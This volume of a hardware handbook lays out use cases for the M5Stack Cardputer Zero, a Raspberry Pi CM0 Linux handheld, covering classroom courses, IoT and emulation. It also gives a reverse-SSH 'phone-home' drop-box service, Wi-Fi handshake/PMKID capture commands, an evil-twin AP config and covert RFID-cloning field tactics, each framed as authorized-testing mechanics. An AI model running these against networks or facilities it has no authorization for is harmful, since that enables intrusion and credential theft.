M5Stack Cardputer Zero · Volume 9
M5Stack Cardputer Zero Volume 9 — Use Cases and Recipes
Linux teaching machine, network drop box, Linux-native pentest workflows, retro emulation + IoT — the CM0 pocket-computer's real use scenarios
9.1 About this volume
Vol 9 covers the end-to-end use-case recipes that make sense for the Cardputer Zero specifically. The defining fact that shapes every recipe below: the Zero is a pocket-sized Linux computer — a Raspberry Pi Compute Module 0 (CM0), the same RP3A0 system-in-package (Broadcom BCM2710A1 / quad-core ARM Cortex-A53 @ 1.0 GHz, ARMv8-A / aarch64) used on the Raspberry Pi Zero 2 W, with 512 MB LPDDR2, booting Raspberry Pi OS / Debian aarch64 off microSD. There is no firmware to flash and no Arduino sketch — every recipe here is “install a Linux package and run it,” exactly as on a Pi Zero 2 W. Hardware context is in Vol 2; the OS/dev story is in Vol 6 and Vol 7.

Because it runs a full OS, the Zero’s distinctive recipes are the ones a small Linux box with a keyboard, screen, Ethernet RJ45, 2.4 GHz Wi-Fi/BLE, a USB-A host port, a battery, and an RF expansion bus unlocks: a Linux teaching machine students keep, a headless network drop box, a Linux-native field pentest box, a retro-emulation console, and an IoT/home-automation client — all from one $59–89 device.
Why earlier drafts of this volume said “flash Marauder” and “$30.” The research-baseline series (2026-05-13) was written before the product shipped and reasoned from the “Zero” name in M5Stack’s portfolio: it assumed a budget ESP32-S3 microcontroller in the mold of the original Cardputer / ADV — hence “flash NEMO/Bruce/Marauder firmware,” MicroHydra apps, ESP-NOW chat, ESPHome nodes, and a ~$30–40 price. The Kickstarter launch (2026-05-26) confirmed the opposite: a Pi CM0 Linux handheld at $59 Lite / $89 Full (regular $99 / $149). None of the ESP32 firmwares boot on it — they are heritage of the Cardputer series, not the Zero. The recipes below replace each ESP32 idea with its Linux-native equivalent (Marauder → aircrack-ng/Kismet/bettercap, MicroHydra → libretro/RetroArch +
.debapps, ESPHome → Python + MQTT). See the mapping table in Vol 6.
9.2 Education / classroom recipes
The Zero is not an “Arduino blink” trainer — it is a real Linux teaching computer that fits in a pencil case. A class set teaches the things an MCU board cannot: the shell, SSH, Python on a real OS, git, the filesystem, processes, networking, and — on the Full model — a camera and GPIO. Students learn on the same aarch64 Debian userland that runs on a Raspberry Pi, a cloud VM, and a SBC in industry. And unlike a shared lab PC, each student keeps the hardware.
Pricing reality (corrected): $59 Lite / $89 Full at Kickstarter super-early-bird; $99 / $149 regular. There is no $30 tier. A 30-seat Lite set is 30 × $59 = $1,770 (early-bird) before SD cards and PSUs — budget accordingly; the old “$900 at $30” figure was fiction.
9.2.1 Recipe: a 5-day “intro to Linux + CLI” course on hardware students keep
Setup
- 30× Cardputer Zero Lite ($59 each → ~$1,770)
- 30× microSD cards (Lite ships none — the OS lives here; 16 GB minimum, A1-rated for IOPS)
- 30× USB-C 5 V/2 A supplies (the CM0 wants 5 V/2 A; see Vol 5)
- 1× instructor machine to flash the class image (Raspberry Pi Imager or the M5
m5stack-imager)
Image prep (once, on the instructor machine): build one golden Raspberry Pi OS / Debian aarch64 image with the accounts, Wi-Fi, and packages pre-seeded, then clone it to all 30 cards.
# On the instructor PC — write the golden image to each student card:
rpi-imager --cli classroom-golden.img /dev/sdX # or: dd if=... of=...
# Pre-seed inside the image's rootfs before cloning (chroot or first-boot script):
# useradd -m student ; apt-get install -y git python3 python3-pip tmux nano htop
# raspi-config nonint do_ssh 0 # enable SSH for headless help
# wpa_passcli 'ClassroomWiFi' 'passphrase' # classroom network
Daily flow — every line is a real Linux skill, not a toy:
Day 1 The shell + filesystem
├─ boot to a login; pwd / ls / cd / cp / mv / mkdir / man
├─ edit a file in nano; cat / less / grep it
└─ exercise: organize a directory tree from a tarball
Day 2 Processes, packages, the network
├─ ps / top(htop) / kill ; apt-get install a package
├─ ip a, ping, ssh student@neighbor's-Zero (peer-to-peer over classroom Wi-Fi)
└─ exercise: SSH into a partner's Zero and leave a file in their home dir
Day 3 Python on a real OS
├─ python3 REPL; write + run a script from a file; pip install requests
├─ HTTP GET a public API, parse JSON
└─ exercise: a script that prints the weather to the 320x170 LCD
Day 4 git + collaboration
├─ git init / add / commit / log / branch
├─ clone the class repo, make a change, push
└─ exercise: submit homework as a pull request
Day 5 Capstone (Full units): camera + GPIO
├─ libcamera-still from the IMX219 (Full only)
├─ blink an LED on the Cap EXT header via libgpiod
└─ open-ended project
Tip. SSH turns the whole class into a single teaching surface: the instructor can
sshinto any student’s Zero from the front-of-room machine to see exactly what they typed — no “screen mirroring” hardware, just the network the lesson already teaches. The Ethernet RJ45 (§3) is the wired fallback when classroom Wi-Fi is saturated.
Why Zero: it is the cheapest device in the lineup that runs real Linux, so the curriculum is transferable to any Linux box the student meets later; the QWERTY + screen means no host PC is needed once it boots; and the per-seat cost is justified by the student keeping a working pocket computer.
9.2.2 Recipe: workshop / hackathon kit (CM0 edition)
Build one golden microSD image and clone it to every kit. Pre-seed:
- the venue Wi-Fi (
wpa_supplicant.confor NetworkManager profile) - the dev toolchain students will use (
git,python3,build-essential, and theczdevCLI fromCardputerZero-AppBuilderif they will build LVGL.debapps for the 320×170 LCD — Vol 7) - a starter repo cloned into
~/
Participants branch from that baseline. Reset between events is a re-image of the SD card (Imager/dd), not a firmware reflash — wipe is total and takes minutes per card with a multi-card writer.
9.2.3 Recipe: embedded-Linux lab fixture
In a college or corporate training lab, one Zero per workstation, on wired Ethernet for deterministic networking:
Table 1 — In a college or corporate training lab, one Zero per workstation, on wired Ethernet for deterministic networking
| Lab role | What the Zero provides |
|---|---|
| Embedded-Linux bring-up | Real device-tree overlays (m5stack-linux-dtoverlays), a CM0 kernel (cm0-firmware), /boot/config.txt — the actual Pi boot chain, not an emulator |
| GPIO / I²C / SPI labs | The Cap EXT 14-pin header exposes SPI/UART/I²C/GPIO/5 V/GND; drive sensors with libgpiod, i2c-tools, spidev |
| Networking labs | RJ45 + on-module Wi-Fi → two interfaces for routing/bridging/tcpdump exercises |
| Camera / vision (Full) | libcamera + the 8 MP IMX219 for an intro-to-CV station |
The lower per-seat cost than a full SBC-plus-peripherals bundle lets the lab afford more stations, and the skills map 1:1 onto industrial embedded-Linux work.
9.3 Fleet-ops / network-drop-box patterns
The Zero’s combination of Linux + a wired Ethernet RJ45 + 2.4 GHz Wi-Fi + an internal 1500 mAh battery + USB-C charging is exactly the recipe for a network drop box — the classic “leave a small Linux box on the target network and call home” tool, the role a Raspberry Pi or LAN Turtle plays. Everything here is ordinary Linux: systemd services, cron, ssh/autossh, tcpdump. No firmware.
Posture warning. A drop box is, by design, an unattended computer with credentials and network access. It only goes on networks you own or are written-authorization to test. The full operational-posture / chain-of-custody / legal treatment is in Vol 11 and
../../_shared/legal_ethics.md; this section covers the mechanics.
9.3.1 Recipe: phone-home drop box (reverse SSH over Ethernet)
Goal: plug the Zero into a target LAN (RJ45) or sit it on Wi-Fi; it dials out to your jump host so you get a shell back in through NAT/firewalls.
autossh reverse tunnel as a systemd service (/etc/systemd/system/phonehome.service):
[Unit]
Description=Reverse SSH phone-home
After=network-online.target
Wants=network-online.target
[Service]
User=drop
Environment=AUTOSSH_GATETIME=0
# bind the jump host's 2222 back to this box's sshd on 22:
ExecStart=/usr/bin/autossh -M 0 -N -o ServerAliveInterval=30 -o ServerAliveCountMax=3 \
-o ExitOnForwardFailure=yes -i /home/drop/.ssh/id_ed25519 \
-R 2222:localhost:22 drop@jump.example.net
Restart=always
RestartSec=15
[Install]
WantedBy=multi-user.target
sudo systemctl enable --now phonehome.service # survives reboot, auto-reconnects
# From your jump host, reach the drop box: ssh -p 2222 drop@localhost
Hardening notes: key-only SSH (no passwords), a dedicated low-priv drop user, and a cron @reboot or systemd watchdog as a second restart path. The on-board RTC (RX8130CE, Vol 2) keeps timestamps sane across power cycles when the box is offline.
9.3.2 Recipe: scheduled passive capture to SD
Goal: unattended traffic/recon collection written to the microSD, retrieved later — no live tunnel needed.
# /etc/cron.d/capture — rotate a 15-min pcap every quarter hour, keep storage bounded
*/15 * * * * drop /usr/bin/timeout 900 /usr/sbin/tcpdump -i eth0 -s 0 \
-w /mnt/sd/cap/%Y%m%d-%H%M.pcap -G 900 -W 1 2>/dev/null
A small Python collector is the more flexible alternative — schedule it the same way, and have it gzip and prune as it goes:
#!/usr/bin/env python3
# /opt/collector/run.py — append timestamped JSON, rotate by size
import json, time, gzip, pathlib, subprocess
out = pathlib.Path("/mnt/sd/cap"); out.mkdir(parents=True, exist_ok=True)
sample = {"t": time.time(),
"wifi": subprocess.run(["iw","dev","wlan0","scan"],capture_output=True,text=True).stdout[:4000]}
with gzip.open(out/f"{int(time.time())}.json.gz","wt") as f:
json.dump(sample, f)
The Full model’s bundled 32 GB microSD is the capture store; on a Lite, size the card to the engagement (pcap fills fast). 512 MB RAM is plenty for tcpdump/tshark capture — defer heavy analysis to a workstation (Vol 11).
9.3.3 Recipe: remote sensor / telemetry node
Goal: a headless box reporting environmental or network telemetry home over the battery’s runtime, or indefinitely on USB-C power.
Per unit:
- a sensor on the Cap EXT I²C/GPIO header (read with
libgpiod/i2c-tools— §6) or a USB sensor on the USB-A host port - a
systemdservice orcronjob that samples and POSTs/MQTT-publishes home - Ethernet preferred where a jack exists (deterministic, no Wi-Fi key on the box); Wi-Fi where it doesn’t
Because it is a full Linux host, the same box can run the collector and the phone-home tunnel (§3.1) and local pre-processing — something an MCU sensor node cannot do in one image.
9.3.4 Fleet economics (corrected)
Table 2 — 3.4 Fleet economics (corrected)
| Line item | Qty | Unit | Subtotal |
|---|---|---|---|
| Cardputer Zero Lite (early-bird) | 10 | $59 | $590 |
| microSD (16–32 GB, A1) | 10 | $8 | $80 |
| USB-C 5 V/2 A supply | 10 | $6 | $60 |
| 10-unit drop-box fleet | ≈ $730 |
This is not the throwaway-at-$30 fleet the old draft imagined — at ~$73/unit, a Zero drop box is a deliberate, recoverable asset, not an expendable. If you need a genuinely disposable HID-injection implant, that is an O.MG-cable / Bash Bunny job (../../Ducky Script/), not a $73 Linux computer. The Zero earns its place in fleet ops by being a small general-purpose Linux host you can also SSH into, reconfigure live, and repurpose — capabilities an ESP32 firmware drop never had.
9.4 Budget pentest workflows
This is the headline Hack-Tools use case, and it is the single biggest thing the ESP32 framing got wrong. The Zero does not “flash Marauder.” It runs the same Linux CLI security tooling as a Kali/Parrot laptop — apt-get install it and run it — just on a slower 512 MB quad-A53. Two independent reviewers framed it as “a full Linux pentest toolkit.” Honest tooling map:
Table 3 — This is the headline Hack-Tools use case, and it is the single biggest thing the ESP32 framing got wrong. The Zero does not "flash Marauder." It runs the same Linux CLI security tooling as a Kali/Parrot laptop — apt-get install it and run it — just on a slower 512 MB quad-A53. Two independent reviewers framed it as "a full Linux pentest toolkit." Honest tooling map
| Job | Linux-native tool on the Zero | How it runs |
|---|---|---|
| Wi-Fi recon | kismet, airodump-ng, iw dev … scan | on-module 2.4 GHz radio for passive scan; USB adapter for serious work |
| Wi-Fi audit | aircrack-ng suite, hcxdumptool/hcxtools, wifite, mdk4 | handshake/PMKID capture; injection needs a capable adapter (below) |
| Rogue AP / evil-twin | hostapd + dnsmasq | a real Linux AP, not a fixed-function “evil portal” firmware |
| MITM | bettercap (Wi-Fi, BLE, HID, net) | one tool, scriptable via caplets |
| Network | nmap, tcpdump, tshark, netcat, responder, scapy (Python) | identical to any Linux host |
| Bluetooth/BLE | bluetoothctl/BlueZ, bettercap BLE, gatttool | on-module BT 4.2 BLE; drives the Chameleon Ultra over BLE (§9) |
| Sub-GHz / NFC | Cap CC1101 on the EXT bus; Proxmark3 client over USB-A | Linux drivers, not Flipper-style apps |
| SDR | RTL-SDR on USB-A → rtl_433, dump1090; HackRF possible (lightweight tools only) | see caveats below |
| Mesh / LoRa | Cap LoRa → meshtasticd (native Linux Meshtastic) / trail-mate | the EXT bus the old draft said didn’t exist |
Honest caveats — say these out loud.
- The on-module 2.4 GHz Wi-Fi (the CM0’s Cypress/Broadcom part) has driver-limited monitor/injection support, exactly as on a Pi Zero 2 W. For real Wi-Fi attack work, attach a known monitor-mode-capable USB Wi-Fi adapter via the USB-A host port (e.g. an Atheros AR9271 or a MediaTek/Ralink chipset with
nl80211injection). Treat the internal radio as recon-grade.- 512 MB RAM + quad A53 @ 1 GHz is modest. Fine for recon, scripting, single-tool runs, and drop-box duty. It is not a cracking rig and not a heavy-SDR/DSP host — big wordlist
hashcat/aircrackruns and full GNU Radio flowgraphs belong on a laptop or Pi 5 (§7). On the Zero, capture on the box; crack off-box.- It is a full computer, so it carries a real attack surface itself (SSH creds, no secure boot by default, a trivially-readable microSD). Operational-posture implications are in Vol 11.
9.4.1 Recipe: Wi-Fi recon + handshake capture (Linux)
# USB monitor-mode adapter on the USB-A host port shows up as e.g. wlan1
sudo airmon-ng start wlan1
sudo airodump-ng wlan1mon # survey: BSSIDs, channels, clients
# target one AP/channel, write a capture, catch the 4-way handshake / PMKID:
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w /mnt/sd/cap wlan1mon
sudo hcxdumptool -i wlan1mon -o /mnt/sd/cap/pmkid.pcapng --enable_status=1
# convert + crack OFF-BOX on a laptop/Pi 5:
hcxpcapngtool -o hash.hc22000 /mnt/sd/cap/pmkid.pcapng
Only run against APs you own or are authorized to test (../../_shared/legal_ethics.md). The capture half is well within the Zero’s budget; the crack half is not — move hash.hc22000 to a real machine.
9.4.2 Recipe: BLE inventory + interaction (BlueZ / bettercap)
sudo bettercap # interactive
> ble.recon on # enumerate advertisers, addrs, MFG data
> ble.show # table of seen devices
> ble.enum <mac> # GATT services/characteristics
bluetoothctl covers pairing/inspection; gatttool covers manual GATT. The same BlueZ stack is what drives the Chameleon Ultra over BLE in §9.
9.4.3 Recipe: rogue AP / captive portal — the real Linux way
There is no “Evil Portal firmware” here; you stand up an actual access point with hostapd + dnsmasq and serve whatever page you like with any web server. That is more capable than the fixed ESP32 portal, but also a full-power tool — authorized engagements only, posture per Vol 11.
# minimal hostapd.conf (open AP for an authorized captive-portal assessment)
interface=wlan1
ssid=Guest-WiFi
hw_mode=g
channel=6
# dnsmasq hands out DHCP + redirects DNS to the local portal; nginx/python -m http.server serves it
sudo hostapd /etc/hostapd/hostapd.conf
For depth on rogue-AP tradecraft, cross-ref the WiFi Pineapple deep dive (../../WiFi Pineapple/) — the Zero is the general-purpose-Linux way to do a subset of what the Pineapple does purpose-built.
9.4.4 Recipe: SDR + sub-GHz on a pocket Linux box
# RTL-SDR on USB-A — decode ISM-band telemetry / ADS-B with lightweight tools:
rtl_433 -F json /mnt/sd/cap/433.json # 433/315/868 MHz sensors, TPMS, etc.
dump1090-fa --net # 1090 MHz ADS-B
# Cap CC1101 on the EXT bus → sub-GHz capture/replay via Linux CC1101 drivers
rtl_433/dump1090 run comfortably; GNU Radio is too heavy for 512 MB — keep flowgraph work on the laptop and use the Zero for the lightweight decoders. The Cap CC1101 module (officially supported over the EXT bus) is the on-board sub-GHz/NFC path; a USB Proxmark3 is the lab-grade RFID path.
9.5 Retro gaming + utility scenarios
These are not “flash MicroHydra” recipes — they are real Linux applications, several of which already exist as installable apps in the CardputerZero GitHub org (the .deb AppStore — Vol 7).
9.5.1 Recipe: retro-emulation console (Retro-Zero / RetroArch)
The org ships geo-tp/Retro-Zero, a libretro frontend — i.e. RetroArch cores running natively on the CM0, the same emulation stack used on any Pi. Install it (or RetroArch directly), drop ROMs on the SD, and play on the 46-key QWERTY + 320×170 LCD with audio out the ES8389 codec / 3.5 mm jack.
sudo apt-get install retroarch # or install the Retro-Zero .deb from the AppStore
retroarch -L /usr/lib/libretro/<core>_libretro.so /mnt/sd/roms/<game>
# realistic cores for a quad-A53 @ 1 GHz / 512 MB: 8/16-bit era — NES, SMS/GG,
# Game Boy / GBC / GBA, Genesis, PC Engine. SNES varies by core; treat 32-bit/N64 as out of budget.
The VideoCore IV GPU (OpenGL ES) and a real Linux audio path make this a genuine emulation handheld, not a “minimalist games menu.” Set expectations by era, not by wishful thinking — see the core note above.
9.5.2 Recipe: portable Python / dev REPL + editor
It is Linux, so this is just Linux: python3, nano/vim, tmux, git, a real shell.
python3 # full CPython REPL, not MicroPython
pip install requests rich # real packages from PyPI
nano ~/notes/idea.py ; python3 ~/notes/idea.py
Useful for scripting on the go, ad-hoc computation, SSHing into other boxes, and editing code in the field. The cardputer-zero-shell Wayland desktop + cardputer-zero-default-apps give a small-screen GUI on top when you want it; the Calculator/Calendar/2048 apps already in the org are concrete examples.
9.5.3 Recipe: media + audio utility
The full audio chain (ES8389 codec + AW8737A amp + 1 W speaker + 3.5 mm TRRS) makes these real:
LoFiBox-Zero— the org’s Linux-first music player.StreamPlayer— media/streaming app.AudioSpectrum— audio visualizer (FFT display).- generic Linux tooling:
mpd/mpv/ffmpeg, internet-radio viampv <stream-url>.
9.5.4 Recipe: NC2000 nostalgia emulator + niche apps
eggfly/CardputerZero-NC2000 emulates the 文曲星 / Wenquxing NC2000 e-dictionary PDA on the Zero — a pure-software Linux app, no special hardware. For real short-range mesh chat, the answer is not ESP-NOW (that is Espressif-proprietary and the Zero is not an ESP32) — it is Cap LoRa + meshtasticd or the trail-mate GPS/LoRa-chat/maps app over the EXT bus (§4, §6). For ham weak-signal work, W5DMH/microjs8 drives a JS8 transceiver.
Note. Everything in §5 is an ordinary Linux binary or a
.debfrom the AppStore. “Add a game/app” meansapt-get installor copy a file — never a reflash, and there is no MicroHydra/MicroPython layer in the picture.
9.6 IoT / home automation recipes
ESPHome is firmware for ESP-class microcontrollers and does not run on the Zero. The Zero is the other half of a home-automation setup — a Linux client/controller, the role a Raspberry Pi plays: it talks MQTT, integrates with Home Assistant as a client, runs Node-RED, and reads sensors over GPIO/I²C with libgpiod.
9.6.1 Recipe: MQTT sensor/controller node (Python + paho)
#!/usr/bin/env python3
# read an I2C sensor on the Cap EXT header, publish to the home MQTT broker
import time, smbus2, paho.mqtt.client as mqtt
bus = smbus2.SMBus(1) # /dev/i2c-1 on the EXT/Grove bus
cli = mqtt.Client(); cli.connect("homeassistant.local", 1883)
while True:
temp = read_temp(bus) # your sensor read
cli.publish("home/pocket/temp", temp, retain=True)
time.sleep(30)
sudo apt-get install python3-paho-mqtt python3-smbus i2c-tools
i2cdetect -y 1 # confirm the sensor address on the bus
Run it as a systemd service so it survives reboot. This is a first-class Home Assistant integration over MQTT — no firmware, no YAML-compile-and-flash cycle.
9.6.2 Recipe: GPIO / I²C sensors via libgpiod
The Cap EXT 14-pin header exposes GPIO/I²C/SPI/UART. Modern Linux uses the character-device GPIO API (libgpiod), not the deprecated sysfs:
sudo apt-get install gpiod libgpiod-dev
gpiodetect ; gpioinfo # enumerate the chip + lines
gpioget gpiochip0 17 # read a line
gpioset gpiochip0 17=1 # drive a line (e.g. a relay/LED)
Pair with i2c-tools/spidev for sensor buses, and python3-libgpiod/gpiozero for scripting. The same header drives Cap modules (CC1101, LoRa) — §4.
9.6.3 Recipe: bedside / desk control surface (Node-RED or HA client)
USB-C-powered (no battery worry), the keyboard + 320×170 LCD become a always-on control surface:
- run Node-RED on the Zero (
npm i -g node-red) for flow-based automation, or - run a lightweight Home Assistant dashboard client / a terminal HA CLI, or
- a small LVGL
.debapp built withczdev(Vol 7) that shows status and sends commands over MQTT/REST.
Because it is a real computer, one device can be the bedside display and the MQTT bridge and an SSH jump box — not three separate flashed gadgets.
9.7 Scenarios where Zero is the WRONG tool
The old version of this table was built on the (false) premise that the Zero is a stripped-down ESP32 with no EXT bus, no audio, no IMU, and — most self-contradictorily — “no full Linux capability.” Every one of those was wrong: the Zero is the Linux machine, has the Cap EXT bus, the full audio chain, the 9-axis IMU (Full), and IR TX+RX. So the honest “wrong tool” cases are different. The Zero is the wrong tool when you need:
Table 4 — The old version of this table was built on the (false) premise that the Zero is a stripped-down ESP32 with no EXT bus, no audio, no IMU, and — most self-contradictorily — "no full Linux capability." Every one of those was wrong: the Zero is the Linux machine, has the Cap EXT bus, the full audio chain, the 9-axis IMU (Full), and IR TX+RX. So the honest "wrong tool" cases are different. The Zero is the wrong tool when you need
| You need… | Why the Zero falls short | Reach for instead |
|---|---|---|
Heavy compute / RAM — big-wordlist cracking (hashcat/aircrack), full GNU Radio flowgraphs, many VMs, large datasets | 512 MB RAM + quad A53 @ 1 GHz is a recon/scripting budget, not a workstation | A laptop (Parrot/Kali — ../../Parrot OS/) or a Raspberry Pi 5 |
| Reliable Wi-Fi monitor mode / injection without extra hardware | The on-module 2.4 GHz radio (CM0 Cypress/Broadcom part) is driver-limited for injection, like a Pi Zero 2 W | Attach a USB monitor-mode adapter (then the Zero is fine), or use a WiFi Pineapple (../../WiFi Pineapple/) for purpose-built rogue-AP work |
| A true MCU — hard real-time, deterministic GPIO timing, microamp deep-sleep battery nodes | Linux is not real-time; the CM0 idles ~2.5 W — there is no µA MCU sleep | The ESP32 Cardputer ADV (../../M5Stack Cardputer ADV/) or M5StickS3 (../../M5Stick S3/) — actual microcontrollers |
| ESP-NOW / Arduino-sketch firmware specifically | Not an ESP32 — ESP-NOW and the Arduino/M5Unified stack do not exist here | Any ESP32 Cardputer (ADV/original) |
| A bigger Linux handheld — more RAM, a usable full-size screen/keyboard for sustained work | The Zero is the smallest/cheapest Linux handheld; sustained desktop-class work is cramped | The Clockwork uConsole (Pi CM4 Linux handheld) in the Cyberdecks project — ../../../Cyberdecks/ — the natural step up |
| Lab-grade RFID/NFC or wide SDR | The Zero leans on Cap CC1101 / USB peripherals; it is not a dedicated tool | Proxmark3 RDV4 (../../Proxmark3 RDV4/) for RFID, HackRF One (../../HackRF One/) for SDR |
The throughline: the Zero is a small general-purpose Linux box. When the job wants more Linux horsepower, step up to a Pi 5 / laptop / uConsole; when it wants a microcontroller’s determinism or sleep, step down to the ESP32 Cardputers. It is the wrong tool at both ends of that axis and the right tool in the middle.
9.8 Resources
Cardputer Zero / CM0 ecosystem
- CardputerZero Hub (web UI + App Store): https://cardputerzero.github.io/
CardputerZeroGitHub org (OS, shell, apps): https://github.com/CardputerZero- AppBuilder /
czdevLVGL SDK + emulator: https://github.com/m5stack/CardputerZero-AppBuilder .debapp repository: https://github.com/m5stack/CardputerZeroRepository- Retro-Zero (libretro/RetroArch frontend): https://github.com/geo-tp/Retro-Zero
- trail-mate (GPS / LoRa chat / maps over Cap EXT): https://github.com/CardputerZero/trail-mate
- microjs8 (JS8 ham transceiver controller): https://github.com/W5DMH/microjs8
Raspberry Pi stack (applies directly — CM0 = Pi Zero 2 W silicon)
- Raspberry Pi OS /
raspi-config: https://www.raspberrypi.com/documentation/ - Raspberry Pi Imager: https://www.raspberrypi.com/software/
- libcamera / IMX219 (Full-model camera): https://www.raspberrypi.com/documentation/computers/camera_software.html
- libgpiod: https://git.kernel.org/pub/scm/libs/libgpiod/libgpiod.git
Linux security / IoT tooling referenced above
- Aircrack-ng: https://www.aircrack-ng.org/ · Kismet: https://www.kismetwireless.net/ · bettercap: https://www.bettercap.org/
- hcxdumptool/hcxtools: https://github.com/ZerBea/hcxdumptool · nmap: https://nmap.org/
- meshtasticd (Linux Meshtastic): https://meshtastic.org/docs/software/linux-native/
- rtl_433: https://github.com/merbanan/rtl_433 · Home Assistant: https://www.home-assistant.io/ · Node-RED: https://nodered.org/
Cross-references
- Hardware/OS/dev detail: Vol 2, Vol 6, Vol 7; power/runtime: Vol 5; posture/legal: Vol 11,
../../_shared/legal_ethics.md. - Bigger Linux handheld step-up: the Clockwork uConsole in
../../../Cyberdecks/.
9.9 Working with the Chameleon Ultra
The M5Stack Cardputer Zero — confirmed as a Raspberry Pi Compute Module 0 running Linux — occupies a qualitatively different role in the Chameleon Ultra integration story than its ESP32-S3 sibling the Cardputer ADV does. Where the ADV is a microcontroller running a purpose-built BLE GATT client sketch with a fixed function set, the Zero is a pocket Linux computer: BCM2837 quad-core ARM Cortex-A53, 512 MB RAM, Raspberry Pi OS in its full form. That distinction changes everything about the integration character. The Cardputer Zero can run the ChameleonUltraGUI desktop application in its Flutter Linux build over USB or BlueZ BLE, maintain a local file archive of card credential dumps across multiple engagements, execute Python analysis scripts against captured dump data, and serve as a general-purpose computing environment for anything else the operator’s workflow requires. The ADV is a control surface; the Zero is a full Linux host that happens to fit in a jacket pocket.
As a USB host, the Cardputer Zero connects to the Chameleon Ultra via USB-C and presents the full ChameleonUltraGUI desktop interface over that wired link. The Chameleon Ultra’s USB-C CLI exposes a serial command interface that covers every capability the BLE GATT service exposes, plus a number of configuration and diagnostic operations better suited to desktop-GUI workflows — bulk slot naming, firmware OTA update initiation, device configuration resets, and dump-file transfers at USB-CDC speeds rather than BLE bandwidth. Running the full GUI on the CM0 rather than on a phone or laptop means the operator’s complete Chameleon Ultra control surface fits in a second jacket pocket alongside the device itself. The operator’s left hand holds the Cardputer Zero; the right hand presents the Chameleon Ultra to a reader. No laptop visible, no phone visible — only two compact devices, neither of which presents as a consumer smartphone in an environment that restricts them.
The CM0’s Linux stack also supports the BLE path via the standard BlueZ subsystem available in Raspberry Pi OS. ChameleonUltraGUI’s desktop build connects to the Chameleon Ultra over BLE using the same GATT service the mobile application uses, giving the Cardputer Zero both connection paths simultaneously available. The practical staging discipline is: USB during the preparation phase outside the target facility, where the operator is loading all sixteen slots and wants USB-CDC throughput and a reliable wired connection for bulk dump transfers and firmware OTA updates; BLE during the active field phase inside the facility, where both hands need to be free and a USB cable would be impractical. Switching from the USB path to the BLE path requires only disconnecting the cable — the ChameleonUltraGUI desktop instance reconnects over BLE without restarting.
The combined pocket station — Cardputer Zero in the left pocket, Chameleon Ultra in the right — is a self-contained RFID emulation platform with no Android or iOS dependency and no laptop dependency. The CM0 Linux environment is a full Python runtime: analysis scripts against captured MIFARE Classic dumps, key-dictionary management, credential inventory maintenance across engagements, session logging, and any other utility from the standard Linux ecosystem run natively on the CM0 without installing anything that would not run on a standard Raspberry Pi OS image. This capability set places the Cardputer Zero in a qualitatively different tier from the Cardputer ADV’s BLE sketch: the ADV is useful specifically in device-restricted environments; the Zero is useful in those environments and also as a general-purpose credential management platform for operators who maintain a large, evolving card inventory across extended multi-site engagements. For the complete integration reference from the Chameleon Ultra’s perspective — including the USB and BLE GATT service specifications, the ChameleonUltraGUI desktop build workflow, and the full works-with matrix covering all five companion tools — see Chameleon Ultra.
End of Vol 9. Next: Vol 10 covers building software for the Zero — writing LVGL .deb apps with the czdev SDK and the SDL2 emulator, packaging for the AppStore, and native Linux development on the CM0.
Comments (0)